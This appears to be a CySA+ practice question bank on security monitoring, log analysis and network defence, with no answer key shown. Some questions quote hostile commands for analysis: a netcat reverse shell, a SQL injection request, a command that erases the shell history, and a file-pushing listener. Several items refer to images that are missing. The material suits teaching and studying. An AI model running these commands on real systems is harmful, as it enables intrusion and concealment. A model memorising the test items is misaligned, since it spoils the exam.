James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
The malware is polymorphic and is being identified as multiple viruses because it is changing.
Different antimalware engines call the same malware package by different names.
VirusTotal has likely misidentified the malware package, and this is a false positive.
The malware contains multiple malware packages, resulting in the matches.
Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?
MemCheck
Performance Monitor
WinMem
Top
Abul wants to identify typical behavior on a Windows 10 system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time and performance over a period of time?
sysmon
sysgraph
resmon
resgraph
The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
Calculating minimum viable signature length
Binary fingerprinting to identify the malware author
Building a similarity graph of similar functions across binaries
Heuristic code analysis of development techniques
How is integrated intelligence most commonly used in a firewall system?
The firewall searches for new IPs to block and creates a STIX feed entry.
The intelligence feed provides firewall rules that are implemented on the firewall in real time.
Threat intelligence is used to provide IP information for rules.
Named threat actors are blocked based on their threat level and resource model.
What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
A scripted application installation
Remote execution of code
A scripted application uninstallation
A zero-day attack
Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?
80 and 443
22 and 80
80 and 8088
22 and 443
Use this scenario for questions 8–10.
Lucy is an SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
Heuristic
Behavior
Availability
Anomaly
After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudo-code as follows:
Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.
The average administrator at Lucy's organization is responsible for 150–300 machines.
What danger does Lucy's alert create?
A DDoS that causes administrators to not be able to access systems
A network outage
Administrators may ignore or filter the alerts
A memory spike
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
Trend
Availability
Heuristic
Behavior
Disabling unneeded services is an example of what type of activity?
Threat modeling
Incident remediation
Proactive risk assessment
Reducing the threat attack surface area
Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
A NetBIOS file share
A RADIUS connection
An RDP connection
A Kerberos connection
Angela wants to prevent buffer overflow attacks on a Windows system. What two built-in technologies should she consider?
The memory firewall and the stack guard
ASLR and DEP
ASLR and DLP
The memory firewall and the buffer guard
Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model?
802.1x
DMARC
SPF
802.3
Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
The sudoers file
/var/log/sudo
/var/log/auth.log
root's .bash_log
When Pete connects to his organization's network, his PC runs the NAC software his systems administrator installed. The software communicates to the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using?
Agent-based, in-band
Agentless, in-band
Agent-based, out-of-band
Agentless, out-of-band
What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
How often the directory is accessed
If files in the directory have changed
If sensitive data was copied out of the directory
Who has viewed files in the directory
While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
The user has opened a command prompt on their workstation.
The user has opened a command prompt on the desktop of a remote workstation.
The user has opened an interactive command prompt as administrator on a remote workstation.
The user has opened a command prompt on their workstation as Administrator.
Brian writes a Snort rule that reads
Alert tcp any -> 10.10.11.0/24 3306
What type of traffic will he detect?
MySQL traffic
RDP traffic
LDAP traffic
BGP traffic
What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators?
An IPS
UEBA
An IDS
DMARC
Sadiq wants to deploy an IPS at a network location that will maximize its impact while avoiding unnecessary load. If he wants to place it near the network border shown in the following image, where should he place it?
Point A
Point B
Point C
Point D
While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening?
A firewall is blocking connections from occurring
An IPS is blocking connections from occurring
A SYN flood
An ACK blockage
While reviewing Windows event logs for a Windows 10 system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
The system was shut down.
Another antivirus program has interfered with the scan.
The user disabled the scan.
The scan found a file it was unable to scan.
Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
Blacklisting
IP reputation
Whitelisting
Domain reputation
Gabby executes the following command. What is she doing?
ps -aux | grep apache2 | grep root
Searching for all files owned by root named apache2
Checking currently running processes with the word apache2 and root both appearing in the output of top
Shutting down all apache2 processes run by root
There is not enough information to answer this question.
While reviewing email headers, Saanvi notices an entry that reads:
Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it?
Spoofing MAC addresses
Providing valid credentials
Spoofing IP addresses
Providing fake credentials
Fiona wants to prevent email impersonation of individuals inside her company. What technology can help prevent this?
IMAP
SPF
DKIM
DMARC
Which of the items from the following list is not typically found in an email header?
Sender IP address
Date
Receiver IP address
Private key
Questions 30–32 refer to the following scenario:
Chris is troubleshooting the firewall rulebase that appears here:
Users are reporting that inbound mail is not reaching their accounts. Chris believes that rule 1 should provide this access. The organization's SMTP server is located at 10.15.1.1. What component of this rule is incorrect?
Protocol
Source port
Destination IP
Destination port
The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong?
The protocol is incorrect.
The rules are misordered.
The source port is not specified.
There is no error in the rule, and Chris should check for other issues.
Rule 4 is designed to allow SSH access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong?
The protocol is incorrect.
The rules are misordered.
The destination port is incorrect.
There is no error in the rule, and Chris should check for other issues.
Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested?
Install host firewalls on the systems
Move to a NAT environment
Install an IPS
None of the above
The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
The threat actor
The targeting method
The attack vector
The organizational weakness
Manish is using a NAC system and wants to allow users who do not meet admission requirements to patch their machines. What technique should he use to allow this?
Deny access to the network and require users to connect to a different network to patch before they reconnect
Build a quarantine network that allows access to update sites and tools
Deny all access and contact tech support to patch the system
Allow access and force a reboot after patching
Lisa is aware that multiple members of her organization fell for a phishing attack. What attack vector should she worry about based on this?
Compromised credentials
Malicious insiders
Ransomware
Brute-force
Matt believes that developers in his organization deployed code that did not implement cookies in a secure way. What type of attack would be aided by this security issue?
SQL injection
A denial-of-service attack
Session hijacking
XSS
What type of attack is a back-off algorithm intended to limit or prevent?
Denial-of-service attacks
Brute-force attacks
Compromised credential-based attacks
Trojans
Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources?
STIX and TAXII
SAML and OCSP
STIX and CAB
SAML and TAXII
Cassandra is documenting a threat actor using the STIX 2.0 standard, and she describes the threat actor as wanting to steal nuclear research data. What type of label would this receive in the STIX taxonomy?
An alias
A goal
Their sophistication
Their resource level
Jamal wants to leverage a framework to improve his threat hunting for network defense. What threat hunting framework should he select to help his team categorize and analyze threats more effectively?
MOPAR
CVSS
MITRE ATT&CK
CAPEC
Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements?
Whitelisting
Port Security
NAC
EAP
During a log review, Mei sees repeated firewall entries as shown here:
What service is the remote system most likely attempting to access?
H.323
SNMP
MS-SQL
Oracle
While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
A packer
A crypter
A shuffler
A protector
While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP. What should Nara report has occurred?
Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?
The firewall
The router
The distribution switch
The Windows 2019 server
The Snort IPS that Adam has configured includes a rule that reads
A system that Carlos is responsible for has been experiencing consistent denial of service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?
IP-based blacklisting
Dropping all SYN packets
Using a connection rate or volume-limiting filter per IP
Using a route-blocking filter that analyzes common LOIC routes
Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity?
Prepare
Engage
Presence
Effect
Cormac needs to lock down a Windows workstation that has recently been scanned using nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?
80, 135, 139, and 445
80, 445, and 3389
135, 139, and 445
No ports should be open.
Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?
select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process. action = 'launch'
Processes other than explorer.exe typically do not launch command prompts.
cmd.exe should never launch explorer.exe.
explorer.exe provides administrative access to systems.
cmd.exe runs as administrator by default when launched outside of Explorer.
During Cormac's configuration of his organization's network access control policies, he sets up client OS rules that include the following statements:
ALLOW Windows 7 version *, Windows 10 version *ALLOW OSX version *ALLOW iOS 8.1, iOS 9 version *ALLOW Android 7.*
After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?
Insecure clients
Incorrect NAC client versions
OS version mismatch
Patch level mismatch
Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as?
DNS masquerading
DNS sinkholing
DNS re-sequencing
DNS hierarchy revision
Maria is an Active Directory domain administrator for her company, and she knows that a quickly spreading botnet relies on a series of domain names for command and control, and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems?
Force a BGP update
Set up a DNS sinkhole
Modify the hosts file
Install an antimalware application
While analyzing a malware package, Ryan finds a list of hostnames shown here:
Mark writes a script to pull data from his security data repository. The script includes the following query:
select source.name, data.process.cmd, count(*) AS hostcountfrom windows-events where type = 'sysmon' AND data.process.action = 'launch' AND data.process. image.file ='reg.exe' AND data.process.parentImage.file = 'cmd.exe'
He then queries the returned data using the following script:
select source.name, data.process.cmd, count(*) AS hostcountfrom network-events where type = 'sysmon' ANDdata.process.action = 'launch' AND data.process. image.file ='cmd.exe' AND data.process.parentImage.file = 'explorer.exe'
What events will Mark see?
Uses of explorer.exe where it is launched by cmd.exe
Registry edits launched via the command line from Explorer
Registry edits launched via explorer.exe that modify cmd.exe
Uses of cmd.exe where it is launched by reg.exe
Chris operates the point-of-sale (POS) network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the POS terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI DSS and protect his vulnerable systems?
Replace the Windows embedded point of sale terminals with standard Windows systems
Build a custom operating system image that includes the patch
Identify, implement, and document compensating controls
Remove the POS terminals from the network until the vendor releases a patch
Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
Enable host firewalls
Install patches for those services
Turn off the services for each appliance
Place a network firewall between the devices and the rest of the network
Michelle runs the following grep command. What text will it match?
grep -i example *.txt
All text files in the current directory with the word example in it
All occurrences of the text example in all files in the current directory with a .txt extension
All occurrences of the lowercase text example in all files in the current directory with a .txt extension
All TXT files with a filename including the word example in the current directory and all subdirectories
Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection?
TLS
VPN
DLP
FDE
Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?
top
ls -mem
mem
memstat
Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort?
Implement logging
Validate all inputs
Parameterize queries
Error and exception handling
Latisha wants to ensure that BYOD workstations that connect to her network meet specific minimum operating system patch level requirements. She also wants to place them into the correct VLAN for the user group that the logged-in user belongs to. She is deploying her solution to an existing, complex network. What solution should she recommend?
Agent-based, in-line NAC
Agentless, in-line NAC
Agent-based, out-of-band NAC
Agentless, out-of-band NAC
Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this?
Group Policy Object
Organizational unit
Active Directory forest
Domain controller
Eric wants to send an email using a digital signature to ensure that the recipient can prove that the email was sent by him and that the content has not changed. What technology is frequently used for this?
S/MIME
IMAP
DKIM
TLS
Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C; which set of commands will accomplish this?
Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?
iptables -A OUTPUT -d 10.24.31.11 -j DROP
iptables -A INPUT -d 10.24.31.11 -j ADD
iptables -block -host 10.24.31.11 -j DROP
iptables -block -ip 10.24.31.11 -j ADD
Use the following scenario and image to answer questions 68–70.
While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the information shown in the following image:
What issue should Amanda report to the system administrator?
High network utilization
High memory utilization
Insufficient swap space
High CPU utilization
What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
ps
top
proc
load
What command can Amanda use to terminate the process?
term
stop
end
kill
What type of attack does a network administrator need to be aware of when deploying port security?
MAC address spoofing
IP address spoofing
Denial-of-service attacks
ARP spoofing
Piper wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?
#iptables-policy INPUT DROP
#iptables-policy SERVICE DROP
#iptables-policy OUTPUT DROP
#iptables-policy FORWARD DROP
Syd inputs the following command on a Linux system:
#echo 127.0.0.1 example.com>> /etc/hosts
What has she done?
She has added the system to the allowed hosts file.
She has routed traffic for the example.com domain to the local host.
She has overwritten the hosts file and will have deleted all data except this entry.
While reviewing output from the netstat command, John sees the following output. What should his next action be?
[minesweeper.exe] TCP 127.0.0.1:62522 dynamo:0 LISTENING[minesweeper.exe]TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
Capture traffic to 151.101.2.69 using Wireshark
Initiate the organization's incident response plan
Check to see if 151.101.2.69 is a valid Microsoft address
Ignore it; this is a false positive.
What does EDR use to capture data for analysis and storage in a central database?
A network tap
Network flows
Software agents
Hardware agents
While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
Enabling the Bash history
Appending the contents of /dev/null to the Bash history
Logging all shell commands to /dev/null
Allowing remote access from the null shell
Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this?
Reviewing the Message-ID to see if it has been incremented
Checking for the In-Reply-To field
Checking for the References field
You cannot determine if a message was forwarded by analyzing the headers.
While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
Continue to search for other changes
Run diff against the password file
Immediately change her password
Check the passwd binary against a known good version
Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques it not commonly used for legitimate purposes too?
Scheduled tasks
Service replacement
Service creation
Autostart registry keys
Matt is reviewing a query that his team wrote for their threat hunting process. What will the following query warn them about?
select timeInterval(date, '4h'), `data.login.user`,count(distinct data.login.machine.name) as machinecount fromnetwork-events where data.winevent.EventID = 4624 having machinecount> 1
Users who log in more than once a day
Users who are logged in to more than one machine within four hours
Users who do not log in for more than four hours
Users who do not log in to more than one machine in four hours
Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
grep
more
less
strings
Which of the following is not a limitation of a DNS sinkhole?
They do not work on traffic sent directly to an IP address.
They do not prevent malware from being executed.
They can be bypassed using a hard-coded DNS server.
They cannot block drive-by-download attempts.
Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.
What is the Security Content Automation Protocol used for?
Assessing configuration compliance
Testing for sensitive data in transit
Testing for sensitive data at rest
Assessing threat levels
Damian has discovered that systems throughout his organization have been compromised for over a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
Criminal
Hacktivist
APT
Unknown
While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?
CSV
Flat file
API
Email
Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?
The email's headers
Embedded links in the email
Attachments to the email
The email signature block
While reviewing NetFlows for a system on her network, Alice discovers the following traffic pattern. What is occurring?
An SFTP scan with unsuccessful connection attempts
Ric is working on reverse-engineering a malware sample and wants to run the binary but also control the execution as it occurs. What type of tool should he select for this?
A disassembler
A decompiler
A debugger
An unpacker
Jennifer wants to search for terms including “CySA+” and all other variations of the text regardless of which letters may be capitalized. Which of the following commands will find all the terms that match what she is searching for in a text file named example.txt?
grep -i cysa+ example.txt
grep -uc CySA+ example.txt
grep -case cysa+ example.txt
grep example.txt cysa+
Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?
Removing all links in email
Redirecting links in email to a proxy
Scanning all email using an antimalware tool
Using a DNS blackhole and IP reputation list
James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in?
A sandbox
A physical machine
A container
A DMARC
While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start Duration Proto Src IP Addr:Port Dst IPAddr:Port Packets Bytes Flows 2019-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1 2019-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:11518345101 514 M 1
A web browsing session
Data exfiltration
Data infiltration
A vulnerability scan
Luis discovers the following entries in /var/log/auth.log. What is most likely occurring?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
A user has forgotten their password
A brute-force attack against the root account
A misconfigured service
A denial-of-service attack against the root account
Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH?
Add an iptables rule blocking root logins
Add root to the sudoers group
Change sshd_config to deny root login
Add a network IPS rule to block root logins
Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command.
at \workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
It uses the AT command to dial a remote host via NetBIOS.
It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=rootAug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
Which of the following has not occurred?
A user has attempted to reauthenticate too many times.
PAM is configured for three retries and will reject any additional retries in the same session.
Fail2ban has blocked the SSH login attempts.
Root is attempting to log in via SSH from the local host.
Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job?
Time-based
Rule-based
Role-based
Location-based
Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use?
A containerization tool
A virtualization tool
A sandbox tool
A packet analyzer
While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command:
nc -l -p 43501 < example.zip
What happened?
The user set up a reverse shell running as example.zip.
The user set up netcat as a listener to push example.zip.
The user set up a remote shell running as example.zip.
The user set up netcat to receive example.zip.
Susan is hunting threats and performs the following query against her database of event lots. What type of threat is she looking for?
Select source.name, destination.name, count(*) from network-events, where destination.port = '3389'
SSH
MySQL
RDP
IRC
At what point in a continuous integration (CI)/continuous delivery (CD) pipeline should security testing be performed?
After code is checked into the repository
After code is deployed into an automated test environment
After the code is deployed into production
All of the above
Lukas wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Lukas accomplish this for Windows 10 Pro workstations?
Using application whitelisting to prevent all prohibited programs from running
Using Windows Defender and adding the game to the blacklist file
Listing it in the Blocked Programs list via secpol.msc
You cannot blacklist applications in Windows 10 without a third-party application
While reviewing his Apache logs, Oscar discovers the following entry. What has occurred?
10.1.1.1 - - [27/Jun/2019:11:42:22 -0500] "GET/query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20usersHTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
A successful database query
A php overflow attack
A SQL injection attack
An unsuccessful database query
Jason wants to reverse-engineer a malware package. Which of the following tools should he use if he wants to do behavior-based analysis of a worm?
A disassembler
A network analyzer
A PE viewer
A debugger
What will a search using the following command do?
grep -n -i -v mike *
List all the lines where the word Mike shows up, regardless of case in all files in the current directory
Search all files with the word mike in the filename for lowercase words
Search a file named mike for all uppercase words
List all the lines where the word Mike does not show up, regardless of case, in all files in the current directory
Ian lists the permissions for a Linux file that he believes may have been modified by an attacker. What do the permissions shown here mean?
-rwxrw-r&—1 chuck admingroup 1232 Feb 28 16:22 myfile.txt
User chuck has read and write rights to the file; the administrators group has read, write, and execute rights; and all other users only have read rights.
User admingroup has read rights; group chuck has read and write rights; and all users on the system can read, write, and execute the file.
User chuck has read, write, and execute rights on the file. Members of admingroup group can read and write to the file but cannot execute it, and all users on the system can read the file.
User admingroup has read, write, and execute rights on the file; user chuck has read and write rights; and all other users have read rights to the file.
While reviewing web server logs, Danielle notices the following entry. What occurred?
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200
A theme was changed
A file was not found
An attempt to edit the 404 page
The 404 page was displayed
Melissa wants to deploy a tool to coordinate information from a wide range of platforms so that she can see it in a central location and then automate responses as part of security workflows. What type of tool should she deploy?
UEBA
SOAR
SIEM
MDR
While attempting to stop a rogue service, Monica issues the following Linux command on an Ubuntu system using upstart:
service rogueservice stop
After a reboot, she discovers the service running again. What happened, and what does she need to do to prevent this?
The service restarted at reboot, so she needs to include the -p, or permanent, flag.
The service restarted itself, so she needs to delete the binary associated with the service.
The service restarted at reboot, so she should add an .override file to stop the service from starting.
A malicious user restarted the service, so she needs to ensure users cannot restart services.
Why might Mark choose to implement an IPS instead of an IDS?
The IPS can detect attacks that an IDS cannot.
The IPS can block attacks in addition to reporting them.
The IPS can use heuristic analysis.
The IPS can use signature-based analysis.
While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks on the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?
An encrypted RAT
A VPN application
A secure web browser
A base64 encoded packet transfer utility
Bohai uses the following command while investigating a Windows workstation used by his organization's vice president of Finance, who only works during normal business hours. Bohai believes that the workstation has been used without permission by members of his organization's cleaning staff after hours. What does he know if the userID shown is the only userID able to log in to the system, and he is investigating on August 12, 2019?
C:Usersigfish>wmic netlogin get name,lastlogon,badpasswordcountBadPasswordCount LastLogon Name NT AUTHORITYSYSTEM0 20190811203748.000000-240 Financeigfish
The account has been compromised.
No logins have occurred.
The last login was during business hours.
Bohai cannot make any determinations from this information.
After a series of compromised accounts led to her domain being blacklisted, Wang has been asked to restore her company's email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?
Migrate her company's SMTP servers to new IP addresses.
Migrate to a cloud email hosting provider.
Change SMTP headers to prevent blacklisting.
Work with the blacklisting organizations to get removed from the list.
While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of?
Anomalous behavior
Heuristic behavior
Entity behavior
Known-good behavior
While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start Duration Proto Src IP Addr:Port Dst IPAddr:Port Packets Bytes Flows 2019-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1 2019-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:11518345101 514 M 1
A web browsing session
Data exfiltration
Data infiltration
A vulnerability scan
How does data enrichment differ from threat feed combination?
Data enrichment is a form of threat feed combination for security insights, focuses on adding more threat feeds together for a full picture, and removes third-party data to focus on core data elements rather than adding together multiple data sources.
Data enrichment uses events and nonevent information to improve security insights, instead of just combining threat information.
Threat feed combination is more useful than data enrichment because of its focus on only the threats.
Threat feed combination techniques are mature, and data enrichment is not ready for enterprise use.
Isaac wants to prevent hosts from connecting to known malware distribution domains. What type of solution can he use to do this without deploying endpoint protection software or an IPS?
Route poisoning
Antimalware router filters
Subdomain whitelisting
DNS blackholing
Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?
An IPS
An IDS
A HIPS
A HIDS
Attackers have been attempting to log in to Alaina's Cisco routers, causing thousands of log entries, and she is worried they may eventually succeed. Which of the following options should she recommend to resolve this issue?
Prevent console login via SSH
Implement a login-block feature with back-off settings
Move the administrative interface to a protected network
Disable console access entirely
The NetFlow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?
Enable QoS
Enable NetFlow compression
Enable sampling
None of the above
Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, which are becoming more prevalent, and which are decreasing in occurrence. What type of analysis can she perform using this information?
Anomaly
Trend
Heuristic
Availability
Which of the following capabilities is not a typical part of a SIEM system?
Alerting
Performance management
Data aggregation
Log retention
Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?
Use sha1sum to generate a hash for the file and write a script to check it periodically
Install and use Tripwire
Periodically check the MAC information for the file using a script
Encrypt the file and keep the key secret so the file cannot be modified
Maria wants to deploy an antimalware tool to detect zero-day malware. What type of detection method should she look for in her selected tool?
Signature-based
Heuristic-based
Trend-based
Availability-based
Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat?
Anomalies in privileged account usage
Time-based login information
A mobile device profile change
DNS request anomalies
Miguel works for a company that has a network security standard requiring the collection and storage of NetFlow logs from all datacenter networks. Miguel is working to commission a new datacenter network but, due to technical constraints, will be unable to collect NetFlow logs for the first six months of operation. Which one of the following data sources is best suited to serve as a compensating control for the lack of NetFlow information?
Router logs
Firewall logs
Switch logs
IPS logs
Megan wants to check memory utilization on a Macintosh system. What Apple tool can she use to do this?
Activity Monitor
MemControl
Run memstat from the command line
Run memctl from the command line
Which one of the following components is not normally part of an endpoint security suite?
IPS
Firewall
Antimalware
VPN
